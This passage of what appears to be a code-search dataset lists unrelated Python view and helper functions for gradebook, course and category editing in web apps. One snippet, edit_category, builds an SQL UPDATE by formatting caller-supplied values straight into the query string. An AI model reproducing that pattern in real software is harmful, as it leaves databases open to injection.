annotate(std=StdDev('evalassignment__grade_assignment'),\n mean=Avg('evalassignment__grade_assignment'))\n if assignmentype:\n context['assignmentype'] = assignmentype\n context['assignments'] = assignments\n context['range_grades'] = range(assignmentype.nb_grading)\n return render(request, 'gradapp/detail_assignmentype.html',\n context)\n else:\n return redirect('gradapp:list_assignmentypes_running')", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def update_course_index(self, updated_index_entry):\r\n self.db_connection.update_course_index(updated_index_entry)", "def update_experience(uid, rid, increment):\n errmsg = []\n\n experience = Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).first()\n if not experience:\n errmsg.append(\"Experience entry does not exist for the given user ID and restaurant ID.\")\n elif increment < 0:\n errmsg.append(\"Experience cannot be incremented by a negative number.\")\n\n if not errmsg:\n old_level = convert_experience_to_level(experience.experience)\n milestone = get_milestone(uid, rid)\n Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).update(dict(experience=experience.experience + increment))\n db.session.commit()\n if milestone:\n new_level = convert_experience_to_level(experience.experience)\n if old_level < new_level and new_level == int(milestone[\"level\"]):\n update_points(uid, rid, milestone[\"reward\"])\n return None\n\n return errmsg", "def coeff_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n if assignmentype:\n nb_questions = assignmentype.nb_questions\n if request.method == 'POST':\n form = CoeffForm(request.POST,\n nb_questions=nb_questions)\n if form.is_valid():\n assignmentype.questions_coeff = [form.cleaned_data['coeff_%s'\n % i] for i\n in range(1, assignmentype.\n nb_questions + 1)]\n assignmentype.save()\n # Compute all grades\n log = tasks.compute_grades_assignmentype(assignmentype.id)\n logger.error(log)\n return redirect('/detail_assignmentype/%s/' % pk)\n else:\n questions_coeff = assignmentype.questions_coeff\n coeff = {}\n if questions_coeff:\n for i in range(1, nb_questions + 1):\n coeff['coeff_%s' % i] = assignmentype.questions_coeff[i - 1]\n else:\n coeff = dict.fromkeys(['coeff_%s' % i\n for i in range(1, nb_questions + 1)],\n None)\n form = CoeffForm(nb_questions=nb_questions,\n initial=coeff)\n context['form'] = form\n context['assignmentype'] = assignmentype\n return render(request, 'gradapp/coeff_assignmentype.html',\n context)\n return redirect('gradapp:list_assignmentypes_running')", "def update_course_info(self, grades_file_info):\n grades_file = os.path.join(self.path, \"grades.txt\")\n sep, header = grades_file_info\n try:\n for info in file_reading_gen(grades_file, 4, sep, header):\n # StudentID | Course | Grade | InstructorID\n student_id = info[0]\n course_code = info[1]\n grade = info[2]\n instructor_id = info[3]\n\n if student_id not in self.students:\n raise KeyError(\"Student with student id {} does not exists in students.txt\".format(student_id))\n if instructor_id not in self.instructors:\n raise KeyError(\"Instructor with instructor id {} does not exists in instructors.txt\".format(instructor_id))\n\n student = self.students[student_id]\n instructor = self.instructors[instructor_id]\n\n student.courses_completed.add(course_code)\n student.grades[course_code] = grade\n\n instructor.courses_taught.add(course_code)\n instructor.student_count[course_code] += 1\n except ValueError:\n raise ValueError(\"Invalid data in grades.txt\")\n except FileNotFoundError as e:\n print('Missing grades.txt.\\n' + str(e))", "def editProfile():\n form = EditProfileForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/editprofile.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editProfileSection\", section=section))", "def edit(self):\n\n pass", "def edit_recipe(request, **kwargs):\n template = 'recipe/add-edit-vary.html'\n pk = kwargs.get('pk')\n recipe = Recipe.objects.get(pk=pk)\n if request.method == 'POST':\n recipe_form = RecipeForm(request.POST, request.FILES, instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(request.POST,\n prefix='ingredient_form')\n if formset.is_valid() and recipe_form.is_valid():\n recipe_form.save()\n for ingredient in formset.cleaned_data:\n if ingredient:\n if ingredient['id']:\n relationship = RecipeIngredientRelationship.objects.get(id=ingredient['id'].id)\n relationship.quantity = ingredient['quantity']\n relationship.ingredient = ingredient['ingredient']\n relationship.save()\n else:\n new = RecipeIngredientRelationship(recipe=recipe,\n quantity=ingredient['quantity'],\n ingredient=ingredient['ingredient'])\n new.save()\n return HttpResponseRedirect('/')\n else:\n recipe_form = RecipeForm(instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(queryset=recipe.ingredients_in_recipe.all(), prefix='ingredient_form')\n return render(request, template, {'formset': formset,\n 'recipe_form': recipe_form,\n 'page_title': 'Edit Recipe'})", "def save_course(self):\r\n self.course.save()\r\n self.store.update_item(self.course, self.user.id)", "def edit_entry():\n if not check_admin_logged() :\n abort(403)\n\n title = request.form['title']\n category = request.form['category']\n buydate = request.form['buydate']\n ssid = decrypt_book_record(request.form['ssid'])\n\n if not check_items_in_form(title, category, buydate):\n return redirect(url_for('show_entries_admin'))\n\n edited_entry = Entries.query.filter_by(\n id=ssid, title=title, category=category, \\\n buydate=buydate).first()\n\n if edited_entry is not None :\n edited_entry.introduction = request.form['introduction']\n if db.session.is_modified(edited_entry) :\n # commit only if something is modified\n try :\n db.session.commit()\n except IntegrityError as e :\n log_error('error when edit:')\n log_error(e.message)\n flash(u'数据库操作失败导致更新失败!请看后台日志')\n flash(u'成功更新条目')\n\n return redirect(url_for('show_entries_admin'))", "def careerCatagory_edit(request):\r\n action = tool.get_param_by_request(request.GET, 'action', \"add\", str)\r\n page_index = tool.get_param_by_request(request.GET, 'page_index', 1, int)\r\n\r\n careerCatagory = None\r\n if action == \"edit\" or action == \"show\":\r\n _id = tool.get_param_by_request(request.GET, 'id', 0, int)\r\n careerCatagory = api_careerCatagory.get_career_catagory_by_id(_id)\r\n\r\n if careerCatagory.is_error():\r\n return render_to_response(\"404.html\", {}, context_instance=RequestContext(request))\r\n\r\n careerCatagory = careerCatagory.result()[0]\r\n\r\n c = {\"careerCatagory\": careerCatagory, \"action\": action, \"page_index\": page_index}\r\n\r\n return render_to_response(\"mz_course/careerCatagory_save.html\", c, context_instance=RequestContext(request))", "def updateStudentProjectReferences(request):\n\n return updateReferencesForModel('student_project')", "def edit_student(request, s_id):\n user = CustomUser.objects.get(id=s_id)\n student = Student.objects.get(user_id=s_id)\n\n if request.method == 'POST':\n user_edit_form = EditUserForm(request.POST, instance=user)\n student_edit_form = EditStudentForm(request.POST, instance=student)\n\n if user_edit_form.is_valid() and student_edit_form.is_valid():\n user_edit_form.save()\n student_edit_form.save()\n messages.success(request, \"The student's account has been edited successfully\")\n return redirect('student_account', s_id=s_id)\n else:\n messages.error(request, \"The form has not been filled correctly\")\n\n else:\n user_edit_form = EditUserForm(instance=user)\n student_edit_form = EditStudentForm(instance=student)\n\n context = {\n 'user_edit_form': user_edit_form,\n 'student_edit_form': student_edit_form\n }\n return render(request, 'main/edit_student.html', {'user_edit_form': context['user_edit_form'],\n 'student_edit_form': context['student_edit_form']})", "def put(self, request, pk, format=None):\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> requset:{}, pk: {}\".format(\n request.query_params, pk))\n\n try:\n program_id = request.META.get('HTTP_X_SVMS_PROGRAM_ID')\n if not program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Program Id not found\"))\n return Response(\n {\"error\": \"Program Id not found\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n if 'category' in request.data and 'job_title' in request.data[\n 'category']:\n job_title_data = request.data['category']['job_title']\n for data in job_title_data:\n job_title_data_list = {}\n for each_data in data:\n if each_data in EDITABLE_FIELDS:\n job_title_data_list.update(\n {each_data: data[each_data]}\n )\n job_title_obj = JobTitleDetailView.get_object(\n self, data['id'])\n\n if job_title_obj.program_id != program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Not authorized to edit\"))\n return Response(\n {\"error\": \"Not authorized to edit\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n serializer = JobTitleSerializer(\n instance=job_title_obj, data=job_title_data_list,\n partial=True)\n if serializer.is_valid():\n serializer.save()\n else:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk,\n \"Only Job Level, Description and Job Tag is editable\"))\n return Response(\n {\n \"error\": \"Only Job Level, Description and Job Tag is editable\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n catalog_obj = self.get_object(pk)\n serializer = JobCatalogSerializer(catalog_obj)\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, Response:{} \".format(\n pk, serializer.data))\n\n return Response(\n serializer.data,\n status=status.HTTP_200_OK\n )\n except Exception as e:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, e))\n return Response({\"error\": \"{}\".format(e)},\n status=status.HTTP_400_BAD_REQUEST)", "def editItem(category_item_id):\n editedItem = db.findItem(id=category_item_id)\n if editedItem.user_id != login_session['user_id']:\n return not_authorized()\n if request.method == 'POST':\n db.updateItem(editedItem, request.form)\n return redirect(url_for('showCatalog'))\n return render_template(\n 'edit_item.html', categories=db.getAllCategories(), item=editedItem)", "def update_category(data, key):\n try:\n category = Categories.objects.get(pk=key, is_delete=False)\n except ObjectDoesNotExist:\n return Response({'status': CATEGORY_NOT_FOUND}, status=status.HTTP_404_NOT_FOUND)\n\n valid_fields = ['period_number', 'period_name', 'terms']\n correct_details = True\n for field in data:\n if field in valid_fields:\n setattr(category, field, data[field])\n else:\n correct_details = False\n break\n\n if correct_details:\n category.save()\n return Response({'status': CATEGORY_UPDATED}, status=status.HTTP_200_OK)\n return Response({'status': INVALID_FIELDS}, status=status.HTTP_400_BAD_REQUEST)", "def item_update(request):\n if request.method == 'POST':\n item_to_update = get_object_or_404(StockItem, pk=request.POST['id'])\n item_to_update.name = request.POST['name']\n item_to_update.count = int(request.POST['count'])\n item_to_update.date_of_expiration = request.POST['exp']\n item_to_update.fk_category = Category.objects.get(name=request.POST['cat'])\n item_to_update.fk_subcategory = SubCategory.objects.get(name=request.POST['subcat'])\n item_to_update.notes = request.POST['notes']\n item_to_update.save()\n return HttpResponse(status=200)", "def this_is_the_grade(self, grade_to_set):\n\n\t\tcmds.intField(self.grade_intField, edit = True, value = grade_to_set['grade_value'])\n\t\tself.update_subcategory('intField')\n\t\tif grade_to_set['grade_value'] is not '':\n\t\t\tcmds.scrollField(self.comments_text_field, edit = True, text = grade_to_set['comment_text'])\n\t\t\tself.update_subcategory('comments_text')\n\t\tif grade_to_set['default_comments_text'] is not '':\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = grade_to_set['default_comments_text'])\n\t\t\tself.update_subcategory('default_comments_text')\n\t\tif grade_to_set['example_comments_text'] is not '':\n\t\t\tcmds.scrollField(self.example_comments, edit = True, text = grade_to_set['example_comments_text'])\n\t\t\tself.update_subcategory('example_comments_text')\n\n\t\tself.auto_flagged_list = grade_to_set.get('examples', [])\n\t\tself.log('auto_flagged_list updated: \\n{}'.format(self.auto_flagged_list))", "def __ui_update_student(self):\n student_id = input(\"student id: \")\n student_name = input(\"student discipline_name: \")\n disciplines_list = []\n\n discipline_name = None\n while discipline_name != '':\n discipline_name = input(\"Discipline discipline_name: \")\n if discipline_name == '':\n break\n elif self.__discipline_controller.find_by_name(discipline_name) is not None:\n disciplines_list.append(discipline_name)\n print(\"Add discipline successful\\n\")\n else:\n print(\"Invalid discipline!\")\n\n try:\n self.__student_controller.update_student(student_id, student_name, disciplines_list)\n print(\"Update student successful\\n\")\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def update_shift(self, shift_id, pro, mid, beginner):\n try:\n self.db_handler.update_shift_by_id(shift_id, pro, mid, beginner)\n self.logger.write_to_log('shift updated', 'model')\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def test_update_entry_courses(self):\r\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\r\n pass", "def give_extra_credit(grades,netids,bonus):\n # No accumulator. This is a procedure\n \n for student in netids:\n if student in grades: # Test if student is a key in grades\n grades[student] = grades[student]+bonus", "def put(self, request, pk):\n return self.update(request, pk)", "def update_decision(request, sub_id):\n submission = get_object_or_404(Submission, id=sub_id)\n validate_chair_access(request.user, submission.conference)\n stage, _ = ReviewStage.objects.get_or_create(\n submission=submission,\n num_reviews_required=(\n submission.stype.num_reviews if submission.stype else 0),\n locked=False)\n decision = stage.decision\n form = UpdateReviewDecisionForm(request.POST, instance=decision)\n if form.is_valid():\n form.save()\n return JsonResponse(status=200, data={})\n return JsonResponse(status=500, data={'errors': form.errors})", "def _add_grade_to_row(self, component, score):\r\n component_index = self.components.setdefault(component, len(self.components))\r\n self._current_row[component_index] = score", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = self.request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'update-course-category', {'key': key}):\n return\n\n if not roles.Roles.is_super_admin():\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': self.KEY})\n return\n\n payload = request.get('payload')\n updated_dict = transforms.json_to_dict(\n transforms.loads(payload), self.get_schema_dict())\n\n errors = []\n self.apply_updates(updated_dict, errors)\n if not errors:\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n course = get_course_with_access(\r\n request.user, 'instructor', course_id, depth=None\r\n )\r\n try:\r\n user = get_student_from_identifier(request.GET.get('unique_student_identifier'))\r\n except User.DoesNotExist:\r\n response_payload = {\r\n 'unique_student_identifier': request.GET.get('unique_student_identifier'),\r\n 'userDoesNotExist': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n # Check that user is active, because add_users\r\n # in common/djangoapps/student/roles.py fails\r\n # silently when we try to add an inactive user.\r\n if not user.is_active:\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'inactiveUser': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n rolename = request.GET.get('rolename')\r\n action = request.GET.get('action')\r\n\r\n if not rolename in ['instructor', 'staff', 'beta']:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"unknown rolename '{}'\".format(rolename)\r\n ))\r\n\r\n # disallow instructors from removing their own instructor access.\r\n if rolename == 'instructor' and user == request.user and action != 'allow':\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'removingSelfAsInstructor': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n if action == 'allow':\r\n allow_access(course, user, rolename)\r\n elif action == 'revoke':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"unrecognized action '{}'\".format(action)\r\n ))\r\n\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'success': 'yes',\r\n }\r\n return JsonResponse(response_payload)", "def insert_grade(grade, form, rc):\n dbname = form[\"dbname\"]\n collname = \"grades\"\n try:\n coll = rc.client[dbname][collname]\n except (KeyError, AttributeError):\n abort(404)\n try:\n added = rc.client.insert_one(dbname, collname, grade)\n except Exception:\n traceback.print_exc()\n raise", "def update(self, request, *args, **kwargs):\n response = super(CategoryViewSet).update(self, request, *args, *kwargs)\n response.data['message'] = \"Categoria ha sido editada\"", "def update_search_parameters(self, selected_gender, selected_category, selected_subcategory):\r\n self.model.set_gender(selected_gender)\r\n self.model.set_category(selected_category)\r\n self.model.set_subcategory(selected_subcategory)\r\n self.model.fetch_results()", "def update_enrollment(context: dict) -> dict:\n enrollment = (\n session.query(Enrollment)\n .filter_by(\n subject_code=context[\"subject_code\"],\n student_ra=context[\"student_ra\"],\n year=context[\"year\"],\n semester=context[\"semester\"],\n )\n .first()\n )\n\n if enrollment:\n for attr in context.keys():\n setattr(enrollment, attr, context[attr])\n\n enrollment.save()\n\n return enrollment.asdict()", "def change_votes(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk, new_votes = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n this_problem = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(this_problem.value)\r\n # problem_dict[answer][pk] points to a [hint_text, #votes] pair.\r\n problem_dict[answer][pk][1] = int(new_votes)\r\n this_problem.value = json.dumps(problem_dict)\r\n this_problem.save()", "def take_test(exam, student):\n\n student.score = exam.administer()", "def edit_category(category):\n # Verify user login. If not, redirect to login page.\n login_status = None\n if 'email' in login_session:\n login_status = True\n else:\n flash('Please log in.')\n return redirect(url_for('home'))\n if request.method == 'POST':\n # Query database with SQLAlchemy and store query as an object\n category = (session.query(Categories)\n .filter_by(name=category.replace('-', ' '))\n .one())\n # Get form fields\n edit_category_name = request.form['edit_category_name']\n # Get user's database ID\n user_db_id = (session.query(Users)\n .filter_by(email=login_session['email'])\n .one()).id\n # Get database ID of category creator\n creator_db_id = category.creator_db_id\n print(\"Current user's database primary key id is {}.\"\n .format(user_db_id))\n print(\"Category creator's database primary key id is {}.\"\n .format(creator_db_id))\n print('Category to edit is \"{}\".'.format(category.name))\n # Only allow creator to edit. If not, redirect to login.\n if user_db_id != creator_db_id:\n flash('Only the creator can edit. Please log in as creator.')\n return redirect(url_for('home'))\n # Flash messages for incomplete item info\n if not request.form['edit_category_name']:\n flash('Please identify category.')\n return redirect(url_for('edit_category'))\n # Overwrite object with new info for database\n category.name = edit_category_name\n print('Category name for database is \"{}\".'.format(category.name))\n session.add(category)\n session.commit()\n # Return to homepage\n return redirect(url_for('home'))\n else:\n # Render webpage\n return render_template('edit_category.html',\n category_name=category,\n login_status=login_status)", "def edit(self, *args, **kw):\n\t\t\ttmpl_context.widget = self.edit_form\n\t\t\tpks \t\t= self.provider.get_primary_fields(self.model)\n\t\t\tkw \t\t\t= {}\n\n\t\t\tfor i, pk in enumerate(pks):\n\t\t\t\tkw[pk] \t\t= args[i]\n\n\t\t\tvalue \t\t= self.edit_filler.get_value(kw)\n\t\t\tvalue['_method'] \t= 'PUT'\n\n\t\t\treturn dict(value = value, model = self.model.__name__, pk_count = len(pks))", "def test_update_category(self):\n pass", "def update(request):\n\tcourse_id = request.GET.get('course_id')\n\tif request.method == 'POST':\n\t\tcourse_title = request.POST['course_title']\n\t\tinstitute_name = request.POST['institute_name']\n\t\tcourse_desc = request.POST['course_desc']\n\t\tcurrent_data = Course.objects.get(course_id = course_id)\n\t\tcurrent_data.course_title = course_title\n\t\tcurrent_data.institute_name = institute_name\n\t\tcurrent_data.course_desc = course_desc\n\t\tcurrent_data.save()\n\t\treturn HttpResponseRedirect(reverse('courseapp:index'))\n\tdata = Course.objects.get(course_id = course_id)\n\treturn render(request,'update.html',{'data':data})", "def test_superuser_edit_assessment(self):\n req, resp = data.assessment_02_request, data.assessment_02_response\n resp['contract'] = self.contract['id']\n\n response = self.superuser.put(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def modificarcategoria(self, categoria):\n self.categoria=categoria", "def edit_change_plan_actio(\r\n self, original_step: int, change_plan_action: ChangePlanAction\r\n ) -> None:\r\n try:\r\n conditions = []\r\n conditions.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions.append(ChangePlanActionEntry.step == original_step)\r\n conditions.append(ChangePlanActionEntry.action != Constants.COLLATERAL_KEY)\r\n\r\n old_entry: ChangePlanActionEntry = ChangePlanActionEntry.query.filter(\r\n and_(*conditions)\r\n ).first()\r\n\r\n # Deleting old colateral conditions\r\n conditions_colat = []\r\n conditions_colat.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions_colat.append(ChangePlanActionEntry.step == original_step)\r\n conditions_colat.append(\r\n ChangePlanActionEntry.action == Constants.COLLATERAL_KEY\r\n )\r\n\r\n ChangePlanActionEntry.query.filter(and_(*conditions_colat)).delete()\r\n\r\n # Edit sequence of actions if order changes\r\n if original_step != change_plan_action.step:\r\n self._edit_change_plan_sequence(\r\n change_plan_action.change_plan_id,\r\n original_step,\r\n change_plan_action.step,\r\n )\r\n\r\n old_entry.step = change_plan_action.step\r\n old_entry.action = change_plan_action.action\r\n old_entry.original_asset_number = change_plan_action.original_asset_number\r\n old_entry.new_record = change_plan_action.new_record\r\n\r\n db.session.commit()\r\n except:\r\n print(\r\n f\"Failed to update change plan action on asset {change_plan_action.original_asset_number}\"\r\n )", "def test_update_preferences_by_category(self):\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def editCategory(category_id):\n\n if 'username' not in login_session:\n return redirect('/login')\n\n editedCategory = session.query(Category).filter_by(id=category_id).one()\n if editedCategory.user_id != login_session['user_id']:\n flash('You are not the creator of %s category, and cannot modify it' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n if request.method == 'POST':\n if \"btn_edit\" in request.form:\n if request.form['name']:\n editedCategory.name = request.form['name']\n flash('Category Successfully Edited %s' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return render_template('editCategory.html',\n category=editedCategory,\n user=getUserInfo(login_session['user_id']))", "def assignment_grade(id, session_id, course_id):\n\n user_id = session.get('user_id')\n\n con = db.get_db()\n cur = con.cursor()\n cur.execute(\"\"\"SELECT DISTINCT(ROUND(grades.points_received / grades.total_points, 2) * 100) as assignment_grade,\n grades.total_points as total, grades.points_received as earned,\n grades.submission as submission, grades.feedback as feedback,\n grades.student_id, grades.assignment_id as assign_id, assignments.name as assign_name,\n assignments.description as description,\n grades.grade_id, roster.session_id as class_session, courses.name as name\n\t FROM courses JOIN sessions on courses.course_id=sessions.id\n\t JOIN assignments on assignments.session_id=sessions.id\n JOIN grades on grades.assignment_id=assignments.assignment_id\n JOIN roster on roster.session_id=sessions.id\n WHERE grades.assignment_id= %s\n AND grades.student_id= %s\"\"\",\n (id, user_id))\n\n grade = cur.fetchone()\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/assignment_grade.html\", course_id=course_id, session_id=session_id, id=id, grade=grade)", "def edit():", "def test_update_category(self):\n category = sample_category()\n url = category_details_url(category.id)\n self.client.put(url, {\"name\": \"school\"})\n category.refresh_from_db()\n self.assertEqual(category.name, 'school')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def updateEMPStudy(self, study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, \n portal_type, study_title, study_alias, pmid, study_abstract, study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries):\n con = self.getMetadataDatabaseConnection()\n results = con.cursor().callproc('qiime_assets.emp_study_update', \n [study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, portal_type, \n study_title, study_alias, pmid, study_abstract, study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries])", "def _editClickedSlot(self):\r\n\r\n index = self.propertiesTableView.selectionModel().currentIndex()\r\n if index.isValid():\r\n self.propertiesTableView.edit(index)", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def put(self, request, pk):\n data = request.data\n data.pop('skills')\n Department_name = data.pop('department')\n department = Department.objects.get(name=Department_name)\n manager_name = data.pop('manager')\n manager = Manager.objects.get(name=manager_name)\n EmployeeDetail.objects.filter(pk=pk).update(department=department, manager=manager, **data)\n return Response(\n data=\"request.data\"\n )", "def update_category_item(catalog_item_id):\n edited_item = session.query(CatalogItem). \\\n filter_by(id=catalog_item_id).one()\n if request.form['name']:\n edited_item.name = request.form['name']\n if request.form['description']:\n edited_item.description = request.form['description']\n if request.form['price']:\n edited_item.price = request.form['price']\n session.add(edited_item)\n session.commit()", "def put(self, request, pk):\n return self.post(request, pk)", "def approve(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n # Can be optimized - sort the delete list by problem_id, and load each problem\r\n # from the database only once.\r\n problem_in_mod = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_mod.value)\r\n hint_to_move = problem_dict[answer][pk]\r\n del problem_dict[answer][pk]\r\n problem_in_mod.value = json.dumps(problem_dict)\r\n problem_in_mod.save()\r\n\r\n problem_in_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_hints.value)\r\n if answer not in problem_dict:\r\n problem_dict[answer] = {}\r\n problem_dict[answer][pk] = hint_to_move\r\n problem_in_hints.value = json.dumps(problem_dict)\r\n problem_in_hints.save()", "def edit(self, *args, **kw):\n tmpl_context.widget = self.edit_form\n #pks = self.provider.get_primary_fields(self.model)\n \n log.debug(\"soyRomperLB= %s\" %kw)\n\n ###########################################\n pks = self.provider.get_primary_fields(self.model)\n \n ###########################################\n kw = {}\n for i, pk in enumerate(pks):\n kw[pk] = args[i]\n value = self.edit_filler.get_value(kw)\n value['_method'] = 'PUT'\n return dict(value=value, model=self.model.__name__, pk_count=len(pks))", "def editCategory(category_id):\n\n edited_category = session.query(Category).filter_by(id=category_id).first()\n if edited_category.user_id != login_session['user_id']:\n flash(\"You are authorised to Edit category created by You only!\")\n\n return redirect(url_for(\"showCatalog\"))\n\n if request.method == 'POST':\n if request.form['name'] != '':\n edited_category.name = request.form['name']\n session.add(edited_category)\n session.commit()\n flash('Category Successfully Edited %s' % edited_category.\n name)\n return redirect(url_for('showCatalog'))\n else:\n flash(\"Error editing category!\")\n return render_template('editCategory.html',\n category=edited_category)\n else:\n return render_template('editcategory.html',\n category=edited_category)", "def edit_category(self, category_id, category_name, parent_id):\n # [todo] - all parameters except category_id optional, fill others with\n # current values\n\n # [todo] - validate category_id\n # [todo] - validate new values\n\n # open a cursor\n cur = self.get_cursor()\n\n stmt = \"UPDATE categories \" + \\\n \"SET parent_id='{0}', \".format(parent_id) + \\\n \"category_name='{0}' \".format(category_name) + \\\n \"WHERE category_id={0}\".format(category_id)\n\n cur.execute(stmt)\n\n # close the cursor\n self.close_cursor()", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'lesson-edit', {'key': key}):\n return\n\n if not CourseOutlineRights.can_edit(self):\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': key})\n return\n\n course = courses.Course(self)\n lesson = course.find_lesson_by_id(None, key)\n if not lesson:\n transforms.send_json_response(\n self, 404, 'Object not found.', {'key': key})\n return\n\n payload = request.get('payload')\n updates_dict = transforms.json_to_dict(\n transforms.loads(payload), self.SCHEMA_DICT)\n\n lesson.title = updates_dict['title']\n lesson.unit_id = updates_dict['unit_id']\n lesson.objectives = updates_dict['objectives']\n lesson.video = updates_dict['video']\n lesson.notes = updates_dict['notes']\n lesson.activity_title = updates_dict['activity_title']\n lesson.activity_listed = updates_dict['activity_listed']\n lesson.now_available = not updates_dict['is_draft']\n\n activity = updates_dict.get('activity', '').strip()\n errors = []\n if activity:\n lesson.has_activity = True\n course.set_activity_content(lesson, activity, errors=errors)\n else:\n lesson.has_activity = False\n fs = self.app_context.fs\n path = fs.impl.physical_to_logical(course.get_activity_filename(\n lesson.unit_id, lesson.lesson_id))\n if fs.isfile(path):\n fs.delete(path)\n\n if not errors:\n assert course.update_lesson(lesson)\n course.save()\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def case_detail_update_view(request, pk):\n issue = _get_issue(request, pk)\n serializer = IssueDetailSerializer(data=request.data, instance=issue, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({\"issue\": IssueDetailSerializer(issue).data})", "def test_update_enrollment_term(self):\n # This method 